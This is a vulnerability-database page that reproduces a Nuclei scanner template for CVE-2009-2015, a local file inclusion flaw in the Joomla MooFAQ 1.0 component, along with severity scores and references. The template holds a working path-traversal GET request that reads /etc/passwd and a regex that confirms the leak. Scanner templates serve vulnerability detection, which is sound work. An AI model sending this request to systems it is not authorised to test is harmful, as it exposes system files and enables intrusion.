Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2009-2015
HistorySep 27, 2021 - 11:02 a.m.

Joomla! MooFAQ 1.0 - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
3

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.2%

Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a … (dot dot) in the file parameter (local file inclusion).

id: CVE-2009-2015

info:
  name: Joomla! MooFAQ 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
  impact: |
    The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.
  remediation: |
    Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/8898
    - http://www.vupen.com/english/advisories/2009/1530
    - https://nvd.nist.gov/vuln/detail/CVE-2009-2015
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2009-2015
    cwe-id: CWE-22
    epss-score: 0.01197
    epss-percentile: 0.84862
    cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla
    product: joomla
  tags: cve,cve2009,joomla,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210084264e87dd97831fdd770570139d33f282ca38d9dd2d90eb80aa16ac245aade0022100a38d28caf33176434cefef437a45a72f7bce297b01a68dc9d0ffc0ec18545cda:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.6 Medium

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.2%

Related for NUCLEI:CVE-2009-2015